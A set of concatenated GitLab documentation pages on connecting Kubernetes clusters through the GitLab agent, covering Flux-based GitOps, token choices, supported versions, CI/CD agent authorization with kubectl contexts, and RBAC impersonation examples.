Support for automating deploy token creation, rotation, and reporting is proposed in [issue 389393](https://gitlab.com/gitlab-org/gitlab/-/issues/389393). ### Flux to GitLab notification If you configure Flux to synchronize from a Git source, [Flux can register an external job status](https://fluxcd.io/flux/components/notification/providers/#git-commit-status-updates) in GitLab pipelines. To get external job statuses from Flux, you can use: - A project or group deploy token. - A project or group access token. - A personal access token. The token requires `api` scope. To minimize the attack surface of a leaked token, you should use a project access token. Integrating Flux into GitLab pipelines as a job is proposed in [issue 405007](https://gitlab.com/gitlab-org/gitlab/-/issues/405007). ## Related topics - [GitOps working examples for training and demos](https://gitlab.com/groups/guided-explorations/gl-k8s-agent/gitops/-/wikis/home) - [Self-paced classroom workshop](https://gitlab-for-eks.awsworkshop.io) (Uses AWS EKS, but you can use for other Kubernetes clusters) - Managing Kubernetes secrets in a GitOps workflow - [with SOPS built-in to Flux](https://fluxcd.io/flux/guides/mozilla-sops/) - [with Sealed Secrets](https://fluxcd.io/flux/guides/sealed-secrets/)
--- stage: Deploy group: Environments info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Using GitOps with a Kubernetes cluster breadcrumbs: - doc - user - clusters - agent --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Moved](https://gitlab.com/gitlab-org/gitlab/-/issues/346567) from GitLab Premium to GitLab Free in 15.3. - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/346585) to make the `id` attribute optional in GitLab 15.7. - Specifying a branch, tag, or commit reference to fetch the Kubernetes manifest files [introduced](https://gitlab.com/groups/gitlab-org/-/epics/4516) in GitLab 15.7. - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/395364) in GitLab 16.1 to prioritize Flux for GitOps. {{< /history >}} GitLab integrates [Flux](https://fluxcd.io/flux/) for GitOps. To get started with Flux, see the [Flux for GitOps tutorial](getting_started.md). With GitOps, you can manage containerized clusters and applications from a Git repository that: - Is the single source of truth of your system. - Is the single place where you operate your system. By combining GitLab, Kubernetes, and GitOps, you can have: - GitLab as the GitOps operator. - Kubernetes as the automation and convergence system. - GitLab CI/CD for Continuous Integration. - The agent for Continuous Deployment and cluster observability. - Built-in automatic drift remediation. - Resource management with [server-side applies](https://kubernetes.io/docs/reference/using-api/server-side-apply/) for transparent multi-actor field management. 
## Deployment sequence This diagram shows the repositories and main actors in a GitOps deployment: ```mermaid %%{init: { "fontFamily": "GitLab Sans" }}%% sequenceDiagram accTitle: Deployment sequence accDescr: Shows the repositories and main actors in a GitOps deployment. participant D as Developer participant A as Application code repository participant M as Deployment repository participant R as OCI registry participant C as Agent configuration repository participant K as GitLab agent participant F as Flux loop Regularly K-->>C: Grab the configuration end D->>+A: Pushing code changes A->>M: Updating manifest M->>R: Build an OCI artifact M->>K: Notify K->>F: Notify and watch sync R-->>F: Pulling and applying changes K->>M: Notify after sync ``` You should use both Flux and `agentk` for GitOps deployments. Flux keeps the cluster state synchronized with the source, while `agentk` simplifies the Flux setup, provides cluster-to-GitLab access management, and visualizes the cluster state in the GitLab UI. ### OCI for source control You should use OCI images as a source controller for Flux, instead of a Git repository. The [GitLab container registry](../../packages/container_registry/_index.md) supports OCI images. | OCI registry | Git repository | | --- | --- | | Designed to serve container images at scale. | Designed to version and store source code. | | Immutable, supports security scans. | Mutable. | | The default Git branch can store cluster state without triggering a sync. | The default Git branch triggers a sync when used to store cluster state. | ## Repository structure To simplify configuration, use one delivery repository per team. You can package the delivery repository into multiple OCI images per application. For additional repository structure recommendations, see the [Flux documentation](https://fluxcd.io/flux/guides/repository-structure/). 
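The OCI-based source described above can be sketched with Flux resources. A minimal sketch, assuming manifests are pushed as an OCI artifact to the GitLab container registry, and that a docker-registry secret named `registry-credentials` exists (for example, built from a deploy token with the `read_registry` scope); all names, paths, and tags here are illustrative:

```yaml
# Flux pulls the manifests from the OCI artifact in the GitLab container registry.
apiVersion: source.toolkit.fluxcd.io/v1beta2
kind: OCIRepository
metadata:
  name: my-app
  namespace: flux-system
spec:
  interval: 10m
  url: oci://registry.gitlab.com/my-group/my-project/manifests
  ref:
    tag: latest
  secretRef:
    name: registry-credentials   # docker-registry secret, for example from a deploy token
---
# The Kustomization applies the artifact contents to the cluster.
apiVersion: kustomize.toolkit.fluxcd.io/v1
kind: Kustomization
metadata:
  name: my-app
  namespace: flux-system
spec:
  interval: 10m
  sourceRef:
    kind: OCIRepository
    name: my-app
  path: ./
  prune: true
```

The `Kustomization` reconciles the artifact contents into the cluster at the configured interval and prunes resources that were removed from the source.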
## Immediate Git repository reconciliation {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/392852) in GitLab 16.1 with a [flag](../../../administration/feature_flags/_index.md) named `notify_kas_on_git_push`. Disabled by default. - [Enabled on GitLab.com and GitLab Self-Managed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/126527) in GitLab 16.2. - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/410429) in GitLab 16.3. {{< /history >}} Usually, the Flux source controller reconciles Git repositories at configured intervals. This can cause delays between a `git push` and the reconciliation of the cluster state, and results in unnecessary pulls from GitLab. The agent for Kubernetes automatically detects Flux `GitRepository` objects that reference GitLab projects in the instance the agent is connected to, and configures a [`Receiver`](https://fluxcd.io/flux/components/notification/receivers/) for the instance. When the agent for Kubernetes detects a `git push` to a repository it has access to, the `Receiver` is triggered and Flux reconciles the cluster with any changes to the repository. To use immediate Git repository reconciliation, you must have a Kubernetes cluster that runs: - The agent for Kubernetes. - Flux `source-controller` and `notification-controller`. Immediate Git repository reconciliation can reduce the time between a push and reconciliation, but it doesn't guarantee that every `git push` event is received. You should still set [`GitRepository.spec.interval`](https://fluxcd.io/flux/components/source/gitrepositories/#interval) to an acceptable duration. {{< alert type="note" >}} The agent only has access to the agent configuration project and all public projects. The agent is not able to immediately reconcile any private projects, except the agent configuration project. 
Allowing the agent to access private projects is proposed in [issue 389393](https://gitlab.com/gitlab-org/gitlab/-/issues/389393).

{{< /alert >}}

### Custom webhook endpoints

When the agent for Kubernetes calls the `Receiver` webhook, the agent defaults to `http://webhook-receiver.flux-system.svc.cluster.local`, which is also the default URL set by a Flux bootstrap installation. To configure a custom endpoint, set `flux.webhook_receiver_url` to a URL that the agent can resolve. For example:

```yaml
flux:
  webhook_receiver_url: http://webhook-receiver.another-flux-namespace.svc.cluster.local
```

There is special handling for [service proxy URLs](https://kubernetes.io/docs/tasks/access-application-cluster/access-cluster-services/) configured in this format: `/api/v1/namespaces/[^/]+/services/[^/]+/proxy`. For example:

```yaml
flux:
  webhook_receiver_url: /api/v1/namespaces/flux-system/services/http:webhook-receiver:80/proxy
```

In these cases, the agent for Kubernetes uses the available Kubernetes configuration and context to connect to the API endpoint. You can use this if you run an agent outside a cluster and you haven't [configured an `Ingress`](https://fluxcd.io/flux/guides/webhook-receivers/#expose-the-webhook-receiver) for the Flux notification controller.

{{< alert type="warning" >}}

You should configure only trusted service proxy URLs. When you provide a service proxy URL, the agent for Kubernetes sends typical Kubernetes API requests which include the credentials necessary to authenticate with the API service.

{{< /alert >}}

## Token management

To use certain Flux features, you might need multiple access tokens. Additionally, you can use multiple token types to achieve the same result. This section provides guidelines for the tokens you might need, and provides token type recommendations where possible.

### GitLab access by Flux

To access the GitLab container registry or Git repositories, Flux can use:

- A project or group deploy token.
- A project or group deploy key. - A project or group access token. - A personal access token. The token does not need write access. You should use project deploy tokens if `http` access is possible. If you require `git+ssh` access, you should use deploy keys. To compare deploy keys and deploy tokens, see [Deploy keys](../../project/deploy_keys/_index.md). Support for automating deploy token creation, rotation, and reporting is proposed in [issue 389393](https://gitlab.com/gitlab-org/gitlab/-/issues/389393). ### Flux to GitLab notification If you configure Flux to synchronize from a Git source, [Flux can register an external job status](https://fluxcd.io/flux/components/notification/providers/#git-commit-status-updates) in GitLab pipelines. To get external job statuses from Flux, you can use: - A project or group deploy token. - A project or group access token. - A personal access token. The token requires `api` scope. To minimize the attack surface of a leaked token, you should use a project access token. Integrating Flux into GitLab pipelines as a job is proposed in [issue 405007](https://gitlab.com/gitlab-org/gitlab/-/issues/405007). ## Related topics - [GitOps working examples for training and demos](https://gitlab.com/groups/guided-explorations/gl-k8s-agent/gitops/-/wikis/home) - [Self-paced classroom workshop](https://gitlab-for-eks.awsworkshop.io) (Uses AWS EKS, but you can use for other Kubernetes clusters) - Managing Kubernetes secrets in a GitOps workflow - [with SOPS built-in to Flux](https://fluxcd.io/flux/guides/mozilla-sops/) - [with Sealed Secrets](https://fluxcd.io/flux/guides/sealed-secrets/)
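The Flux-to-GitLab notification described under Token management is configured with a Flux notification `Provider` of type `gitlab` and an `Alert`. A minimal sketch, assuming a secret named `gitlab-token` that holds the access token in a `token` field; the project path and resource names are illustrative:

```yaml
# Provider posts commit statuses to the GitLab project.
apiVersion: notification.toolkit.fluxcd.io/v1beta3
kind: Provider
metadata:
  name: gitlab
  namespace: flux-system
spec:
  type: gitlab
  address: https://gitlab.com/my-group/my-project   # project the commits belong to
  secretRef:
    name: gitlab-token   # secret with a `token` field
---
# Alert forwards reconciliation events to the provider.
apiVersion: notification.toolkit.fluxcd.io/v1beta3
kind: Alert
metadata:
  name: gitlab-commit-status
  namespace: flux-system
spec:
  providerRef:
    name: gitlab
  eventSources:
    - kind: Kustomization
      name: my-app
```

Per the Flux provider documentation, commit status updates require the event source to be a `Kustomization`.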
https://docs.gitlab.com/user/clusters/agent
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/user/clusters/_index.md
2025-08-13
doc/user/clusters/agent
_index.md
Deploy
Environments
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Connecting a Kubernetes cluster with GitLab
Kubernetes integration, GitOps, CI/CD, agent deployment, and cluster management.
--- stage: Deploy group: Environments info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Connecting a Kubernetes cluster with GitLab description: Kubernetes integration, GitOps, CI/CD, agent deployment, and cluster management. breadcrumbs: - doc - user - clusters - agent --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - Flux [recommended](https://gitlab.com/gitlab-org/gitlab/-/issues/357947#note_1253489000) as GitOps solution in GitLab 15.10. {{< /history >}} You can connect your Kubernetes cluster with GitLab to deploy, manage, and monitor your cloud-native solutions. To connect a Kubernetes cluster to GitLab, you must first [install an agent in your cluster](install/_index.md). The agent runs in the cluster, and you can use it to: - Communicate with a cluster, which is behind a firewall or NAT. - Access API endpoints in a cluster in real time. - Push information about events happening in the cluster. - Enable a cache of Kubernetes objects, which are kept up-to-date with very low latency. For more details about the agent's purpose and architecture, see the [architecture documentation](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/architecture.md). You must deploy a separate agent to every cluster you want to connect to GitLab. The agent was designed with strong multi-tenancy support. To simplify maintenance and operations you should run only one agent per cluster. An agent is always registered in a GitLab project. After an agent is registered and installed, the agent connection to the cluster can be shared with other projects, groups, and users. This approach means you can manage and configure your agent instances from GitLab itself, and you can scale a single installation to multiple tenants. 
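Agent connection sharing is configured in the agent configuration file stored in the agent's configuration project. A minimal sketch of `.gitlab/agents/<agent-name>/config.yaml` (the project and group paths are placeholders):

```yaml
# Authorize other projects and groups to use this agent's CI/CD connection.
ci_access:
  projects:
    - id: path/to/other-project   # a single project
  groups:
    - id: path/to/group           # a group and all of its subgroups
```

The `ci_access` keyword is described in detail on the CI/CD workflow page.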
## Receptive agents

{{< details >}}

- Tier: Ultimate
- Offering: GitLab Self-Managed

{{< /details >}}

{{< history >}}

- [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/12180) in GitLab 17.4.

{{< /history >}}

Receptive agents allow GitLab to integrate with Kubernetes clusters that cannot establish a network connection to the GitLab instance, but can be connected to by GitLab.

For example, this can occur when:

1. GitLab runs in a private network or behind a firewall, and is accessible only through a VPN.
1. The Kubernetes cluster is hosted by a cloud provider, but is exposed to the internet or is reachable from the private network.

When this feature is enabled, GitLab connects to the agent with the provided URL. You can use agents and receptive agents simultaneously.

## Supported Kubernetes versions for GitLab features

GitLab supports the following Kubernetes versions. If you want to run GitLab in a Kubernetes cluster, you might need a different version of Kubernetes:

- For the [Helm Chart](https://docs.gitlab.com/charts/installation/cloud/).
- For [GitLab Operator](https://docs.gitlab.com/operator/installation.html).

You can upgrade your Kubernetes version to a supported version at any time:

- 1.33 (support ends when GitLab version 19.2 is released or when 1.36 becomes supported)
- 1.32 (support ends when GitLab version 18.10 is released or when 1.35 becomes supported)
- 1.31 (support ends when GitLab version 18.7 is released or when 1.34 becomes supported)

GitLab aims to support a new minor Kubernetes version three months after its initial release. GitLab supports at least three production-ready Kubernetes minor versions at any given time. When a new version of Kubernetes is released, we will:

- Update this page with the results of our early smoke tests within approximately four weeks.
- If we expect a delay in releasing new version support, we will update this page with the expected GitLab support version within approximately eight weeks.
When installing the agent, use a Helm version compatible with your Kubernetes version. Other versions of Helm might not work. For a list of compatible versions, see the [Helm version support policy](https://helm.sh/docs/topics/version_skew/). Support for deprecated APIs can be removed from the GitLab codebase when we drop support for the Kubernetes version that only supports the deprecated API. Some GitLab features might work on versions not listed here. [This epic](https://gitlab.com/groups/gitlab-org/-/epics/4827) tracks support for Kubernetes versions. ## Kubernetes deployment workflows You can choose from two primary workflows. The GitOps workflow is recommended. ### GitOps workflow GitLab recommends using [Flux for GitOps](gitops.md). To get started, see [Tutorial: Set up Flux for GitOps](getting_started.md). ### GitLab CI/CD workflow In a [**CI/CD** workflow](ci_cd_workflow.md), you configure GitLab CI/CD to use the Kubernetes API to query and update your cluster. This workflow is considered **push-based**, because GitLab pushes requests from GitLab CI/CD to your cluster. Use this workflow: - When you have pipeline-driven processes. - When you need to migrate to the agent, but the GitOps workflow doesn't support your use case. This workflow has a weaker security model. You should not use a CI/CD workflow for production deployments. ## Agent connection technical details The agent opens a bidirectional channel to KAS for communication. This channel is used for all communication between the agent and KAS: - Each agent can maintain up to 500 logical gRPC streams, including active and idle streams. - The number of TCP connections used by the gRPC streams is determined by gRPC itself. - Each connection has a maximum lifetime of two hours, with a one-hour grace period. - A proxy in front of KAS might influence the maximum lifetime of connections. 
On GitLab.com, this is [two hours](https://gitlab.com/gitlab-cookbooks/gitlab-haproxy/-/blob/68df3484087f0af368d074215e17056d8ab69f1c/attributes/default.rb#L217). The grace period is 50% of the maximum lifetime.

For detailed information about channel routing, see [Routing KAS requests in the agent](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/kas_request_routing.md).

## Kubernetes integration glossary

This glossary provides definitions for terms related to the GitLab Kubernetes integration.

| Term | Definition | Scope |
| --- | --- | --- |
| GitLab agent for Kubernetes | The overall offering, including related features and the underlying components `agentk` and `kas`. | GitLab, Kubernetes, Flux |
| `agentk` | The cluster-side component that maintains a secure connection to GitLab for Kubernetes management and deployment automation. | GitLab |
| GitLab agent server for Kubernetes (`kas`) | The GitLab-side component that handles operations and logic for the Kubernetes agent integration. Manages the connection and communication between GitLab and Kubernetes clusters. | GitLab |
| Pull-based deployment | A deployment method where Flux checks for changes in a Git repository and automatically applies these changes to the cluster. | GitLab, Kubernetes |
| Push-based deployment | A deployment method where updates are sent from GitLab CI/CD pipelines to the Kubernetes cluster. | GitLab |
| Flux | An open-source GitOps tool that integrates with the agent for pull-based deployments. | GitOps, Kubernetes |
| GitOps | A set of practices that involve using Git for version control and collaboration in the management and automation of cloud and Kubernetes resources. | DevOps, Kubernetes |
| Kubernetes namespace | A logical partition in a Kubernetes cluster that divides cluster resources between multiple users or environments. | Kubernetes |

## Related topics

- [GitOps workflow](gitops.md)
- [GitOps examples and learning materials](gitops.md#related-topics)
- [GitLab CI/CD workflow](ci_cd_workflow.md)
- [Install the agent](install/_index.md)
- [Work with the agent](work_with_agent.md)
- [Migrate to the agent for Kubernetes from the legacy certificate-based integration](../../infrastructure/clusters/migrate_to_gitlab_agent.md)
- [Troubleshooting](troubleshooting.md)
- [Guided explorations for a production ready GitOps setup](https://gitlab.com/groups/guided-explorations/gl-k8s-agent/gitops/-/wikis/home#gitlab-agent-for-kubernetes-gitops-working-examples)
- [CI/CD for Kubernetes examples and learning materials](ci_cd_workflow.md#related-topics)
- [Contribute to the agent's development](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/tree/master/doc)
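In the push-based CI/CD workflow mentioned above, jobs select the agent's Kubernetes context before running `kubectl`. A minimal `.gitlab-ci.yml` sketch (the image choice and context path are illustrative):

```yaml
deploy:
  image:
    name: bitnami/kubectl:latest
    entrypoint: ['']
  script:
    # Context name format: <agent-config-project-path>:<agent-name>
    - kubectl config use-context path/to/agent-project:my-agent
    - kubectl get pods
```

The contexts for all shared agent connections are available through the `kubeconfig` file that GitLab provides to CI/CD jobs.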
https://docs.gitlab.com/user/clusters/ci_cd_workflow
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/user/clusters/ci_cd_workflow.md
2025-08-13
doc/user/clusters/agent
ci_cd_workflow.md
Deploy
Environments
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Using GitLab CI/CD with a Kubernetes cluster
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - Agent connection sharing limit [changed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/149844) from 100 to 500 in GitLab 17.0. {{< /history >}} You can use GitLab CI/CD to safely connect, deploy, and update your Kubernetes clusters. To do so, [install an agent in your cluster](install/_index.md). When done, you have a Kubernetes context and can run Kubernetes API commands in your GitLab CI/CD pipeline. To ensure access to your cluster is safe: - Each agent has a separate context (`kubecontext`). - Only the project where the agent is configured, and any additional projects you authorize, can access the agent in your cluster. To use GitLab CI/CD to interact with your cluster, runners must be registered with GitLab. However, these runners do not have to be in the cluster where the agent is. Prerequisites: - Make sure [GitLab CI/CD is enabled](../../../ci/pipelines/settings.md#disable-gitlab-cicd-pipelines). ## Use GitLab CI/CD with your cluster To update a Kubernetes cluster with GitLab CI/CD: 1. Ensure you have a working Kubernetes cluster and the manifests are in a GitLab project. 1. In the same GitLab project, [register and install the GitLab agent for Kubernetes](install/_index.md). 1. [Update your `.gitlab-ci.yml` file](#update-your-gitlab-ciyml-file-to-run-kubectl-commands) to select the agent's Kubernetes context and run the Kubernetes API commands. 1. Run your pipeline to deploy to or update the cluster. If you have multiple GitLab projects that contain Kubernetes manifests: 1. [Install the GitLab agent for Kubernetes](install/_index.md) in its own project, or in one of the GitLab projects where you keep Kubernetes manifests. 1. [Authorize agent access](#authorize-agent-access) in your GitLab projects. 1. Optional. 
For added security, [use impersonation](#restrict-project-and-group-access-by-using-impersonation). 1. [Update your `.gitlab-ci.yml` file](#update-your-gitlab-ciyml-file-to-run-kubectl-commands) to select the agent's Kubernetes context and run the Kubernetes API commands. 1. Run your pipeline to deploy to or update the cluster. ## Authorize agent access If you have multiple projects with Kubernetes manifests, you must authorize these projects to access the agent. You can authorize agent access for individual projects, groups, or subgroups so all projects have access. For added security, you can also [use impersonation](#restrict-project-and-group-access-by-using-impersonation). Authorization configuration can take one or two minutes to propagate. ### Authorize your projects to access the agent {{< history >}} - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/346566) to remove hierarchy restrictions in GitLab 15.6. - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/356831) to allow authorizing projects in a user namespace in GitLab 15.7. - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/377932) to allow the authorization of groups that belong to different top-level groups in GitLab 18.1. {{< /history >}} To authorize the GitLab project where you keep Kubernetes manifests to access the agent: 1. On the left sidebar, select **Search or go to** and find the project that contains the [agent configuration file](install/_index.md#create-an-agent-configuration-file) (`config.yaml`). 1. Edit the `config.yaml` file. Under the `ci_access` keyword, add the `projects` attribute. 1. For the `id`, add the path to the project. ```yaml ci_access: projects: - id: path/to/project ``` - Authorized projects must have the same top-level group or user namespace as the agent's configuration project, unless the [instance level authorization](#authorize-all-projects-in-your-gitlab-instance-to-access-the-agent) application setting is enabled. 
- You can install additional agents into the same cluster to accommodate additional hierarchies. - You can authorize up to 500 projects. After making these changes: - All CI/CD jobs now include a `kubeconfig` file with contexts for every shared agent connection. - The `kubeconfig` path is available in the `$KUBECONFIG` environment variable. - You can choose the context to run `kubectl` commands from your CI/CD scripts. ### Authorize projects in your groups to access the agent {{< history >}} - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/346566) to remove hierarchy restrictions in GitLab 15.6. - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/377932) to allow the authorization of groups that belong to different top-level groups in GitLab 18.1. {{< /history >}} To authorize all of the GitLab projects in a group or subgroup to access the agent: 1. On the left sidebar, select **Search or go to** and find the project that contains the [agent configuration file](install/_index.md#create-an-agent-configuration-file) (`config.yaml`). 1. Edit the `config.yaml` file. Under the `ci_access` keyword, add the `groups` attribute. 1. For the `id`, add the path: ```yaml ci_access: groups: - id: path/to/group/subgroup ``` - Authorized groups must have the same top-level group as the agent's configuration project, unless the [instance level authorization](#authorize-all-projects-in-your-gitlab-instance-to-access-the-agent) application setting is enabled. - You can install additional agents into the same cluster to accommodate additional hierarchies. - All of the subgroups of an authorized group also have access to the same agent (without being specified individually). - You can authorize up to 500 groups. After making these changes: - All the projects that belong to the group and its subgroups are now authorized to access the agent. - All CI/CD jobs now include a `kubeconfig` file with contexts for every shared agent connection. 
- The `kubeconfig` path is available in the `$KUBECONFIG` environment variable. - You can choose the context to run `kubectl` commands from your CI/CD scripts. ### Authorize all projects in your GitLab instance to access the agent {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab Self-Managed {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/357516) in GitLab 17.11. {{< /history >}} Prerequisites: - You must be an administrator. To allow agents to be configured to authorize all projects in your GitLab instance: {{< tabs >}} {{< tab title="Using the UI" >}} 1. In the **Admin** area, select **Settings > General**, and expand the **GitLab agent for Kubernetes** section. 1. Select **Enable instance level authorization**. 1. Select **Save changes**. {{< /tab >}} {{< tab title="Using the API" >}} 1. [Update the application setting](../../../api/settings.md#update-application-settings) `organization_cluster_agent_authorization_enabled` to `true`. {{< /tab >}} {{< /tabs >}} To authorize the agent to access all of the GitLab projects: 1. On the left sidebar, select **Search or go to** and find the project that contains the [agent configuration file](install/_index.md#create-an-agent-configuration-file) (`config.yaml`). 1. Edit the `config.yaml` file. Under the `ci_access` keyword, add the `instance` attribute: ```yaml ci_access: instance: {} ``` After making these changes to the agent configuration file: - All CI/CD jobs in all projects in your instance are authorized to access the agent. You can use CI/CD job impersonation with RBAC to grant or restrict access as needed. For more information, see [Restrict project and group access by using impersonation](#restrict-project-and-group-access-by-using-impersonation). - All CI/CD jobs include a `kubeconfig` file with contexts for every shared agent connection. - The `kubeconfig` path is available in the `$KUBECONFIG` environment variable. 
- You can choose the context to run `kubectl` commands from your CI/CD scripts. ## Update your `.gitlab-ci.yml` file to run `kubectl` commands In the project where you want to run Kubernetes commands, edit your project's `.gitlab-ci.yml` file. In the first command under the `script` keyword, set your agent's context. Use the format `<path/to/agent/project>:<agent-name>`. For example: ```yaml deploy: image: name: bitnami/kubectl:latest entrypoint: [''] script: - kubectl config get-contexts - kubectl config use-context path/to/agent/project:agent-name - kubectl get pods ``` If you are not sure what your agent's context is, run `kubectl config get-contexts` from a CI/CD job where you want to access the agent. ### Environments that use Auto DevOps If Auto DevOps is enabled, you must define the CI/CD variable `KUBE_CONTEXT`. Set the value of `KUBE_CONTEXT` to the context of the agent you want Auto DevOps to use: ```yaml deploy: variables: KUBE_CONTEXT: path/to/agent/project:agent-name ``` You can assign different agents to separate Auto DevOps jobs. For instance, Auto DevOps can use one agent for `staging` jobs, and another agent for `production` jobs. To use multiple agents, define an [environment-scoped CI/CD variable](../../../ci/environments/_index.md#limit-the-environment-scope-of-a-cicd-variable) for each agent. For example: 1. Define two variables named `KUBE_CONTEXT`. 1. For the first variable: 1. Set the `environment` to `staging`. 1. Set the value to the context of your staging agent. 1. For the second variable: 1. Set the `environment` to `production`. 1. Set the value to the context of your production agent. ### Environments with both certificate-based and agent-based connections When you deploy to an environment that has both a [certificate-based cluster](../../infrastructure/clusters/_index.md) (deprecated) and an agent connection: - The certificate-based cluster's context is called `gitlab-deploy`. This context is always selected by default. 
- Agent contexts are included in `$KUBECONFIG`. You can select them by using `kubectl config use-context <path/to/agent/project>:<agent-name>`.

To use an agent connection when certificate-based connections are present, you can manually configure a new `kubectl` configuration context. For example:

```yaml
deploy:
  variables:
    KUBE_CONTEXT: my-context # The name to use for the new context
    AGENT_ID: 1234 # replace with your agent's numeric ID
    K8S_PROXY_URL: https://<KAS_DOMAIN>/k8s-proxy/ # For agent server (KAS) deployed in Kubernetes cluster (for gitlab.com use kas.gitlab.com); replace with your URL
    # K8S_PROXY_URL: https://<GITLAB_DOMAIN>/-/kubernetes-agent/k8s-proxy/ # For agent server (KAS) in Omnibus
    # Include any additional variables
  before_script:
    - kubectl config set-credentials agent:$AGENT_ID --token="ci:${AGENT_ID}:${CI_JOB_TOKEN}"
    - kubectl config set-cluster gitlab --server="${K8S_PROXY_URL}"
    - kubectl config set-context "$KUBE_CONTEXT" --cluster=gitlab --user="agent:${AGENT_ID}"
    - kubectl config use-context "$KUBE_CONTEXT"
  # Include the remaining job configuration
```

### Environments with KAS that use self-signed certificates

If you use an environment with KAS and a self-signed certificate, you must configure your Kubernetes client to trust the certificate authority (CA) that signed your certificate.

To configure your client, do one of the following:

- Set a CI/CD variable `SSL_CERT_FILE` with the KAS certificate in PEM format.
- Configure the Kubernetes client with `--certificate-authority=$KAS_CERTIFICATE`, where `KAS_CERTIFICATE` is a CI/CD variable with the CA certificate of KAS.
- Place the certificates in an appropriate location in the job container by updating the container image or mounting them via the runner.
- Not recommended. Configure the Kubernetes client with `--insecure-skip-tls-verify=true`.
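For example, the `--certificate-authority` option might be used in a job like this. This is a sketch, not the only supported layout: it assumes you created a CI/CD variable named `KAS_CERTIFICATE` that holds the PEM-encoded CA certificate, and the agent context path is a placeholder:

```yaml
deploy:
  image:
    name: bitnami/kubectl:latest
    entrypoint: ['']
  script:
    # Write the CA certificate from the KAS_CERTIFICATE CI/CD variable to a file
    - echo "$KAS_CERTIFICATE" > kas-ca.pem
    # path/to/agent/project:agent-name is a placeholder for your agent's context
    - kubectl config use-context path/to/agent/project:agent-name
    # Pass the CA file so kubectl trusts the KAS endpoint
    - kubectl --certificate-authority=kas-ca.pem get pods
```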
## Restrict project and group access by using impersonation {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/357934) in GitLab 15.5 to add impersonation support for environment tiers. {{< /history >}} By default, your CI/CD job inherits all the permissions from the service account used to install the agent in the cluster. To restrict access to your cluster, you can use [impersonation](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#user-impersonation). To specify impersonations, use the `access_as` attribute in your agent configuration file and use Kubernetes RBAC rules to manage impersonated account permissions. You can impersonate: - The agent itself (default). - The CI/CD job that accesses the cluster. - A specific user or system account defined within the cluster. Authorization configuration can take one or two minutes to propagate. ### Impersonate the agent The agent is impersonated by default. You don't need to do anything to impersonate it. ### Impersonate the CI/CD job that accesses the cluster To impersonate the CI/CD job that accesses the cluster, under the `access_as` key, add the `ci_job: {}` key-value. When the agent makes the request to the actual Kubernetes API, it sets the impersonation credentials in the following way: - `UserName` is set to `gitlab:ci_job:<job id>`. Example: `gitlab:ci_job:1074499489`. - `Groups` is set to: - `gitlab:ci_job` to identify all requests coming from CI jobs. - The list of IDs of groups the project is in. - The project ID. - The slug and tier of the environment this job belongs to. Example: for a CI job in `group1/group1-1/project1` where: - Group `group1` has ID 23. - Group `group1/group1-1` has ID 25. - Project `group1/group1-1/project1` has ID 150. - Job running in the `prod` environment, which has the `production` environment tier. 
Group list would be `[gitlab:ci_job, gitlab:group:23, gitlab:group_env_tier:23:production, gitlab:group:25, gitlab:group_env_tier:25:production, gitlab:project:150, gitlab:project_env:150:prod, gitlab:project_env_tier:150:production]`.

- `Extra` carries extra information about the request. The following properties are set on the impersonated identity:

| Property                             | Description                                                                  |
| ------------------------------------ | ---------------------------------------------------------------------------- |
| `agent.gitlab.com/id`                | Contains the agent ID.                                                       |
| `agent.gitlab.com/config_project_id` | Contains the agent's configuration project ID.                               |
| `agent.gitlab.com/project_id`        | Contains the CI project ID.                                                  |
| `agent.gitlab.com/ci_pipeline_id`    | Contains the CI pipeline ID.                                                 |
| `agent.gitlab.com/ci_job_id`         | Contains the CI job ID.                                                      |
| `agent.gitlab.com/username`          | Contains the username of the user the CI job is running as.                  |
| `agent.gitlab.com/environment_slug`  | Contains the slug of the environment. Only set if running in an environment. |
| `agent.gitlab.com/environment_tier`  | Contains the tier of the environment. Only set if running in an environment. |

Example `config.yaml` to restrict access by the CI/CD job's identity:

```yaml
ci_access:
  projects:
    - id: path/to/project
      access_as:
        ci_job: {}
```

#### Example RBAC to restrict CI/CD jobs

The following `ClusterRoleBinding` resource restricts all CI/CD jobs to view rights only.

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: ci-job-view
roleRef:
  name: view
  kind: ClusterRole
  apiGroup: rbac.authorization.k8s.io
subjects:
  - name: gitlab:ci_job
    kind: Group
```

### Impersonate a static identity

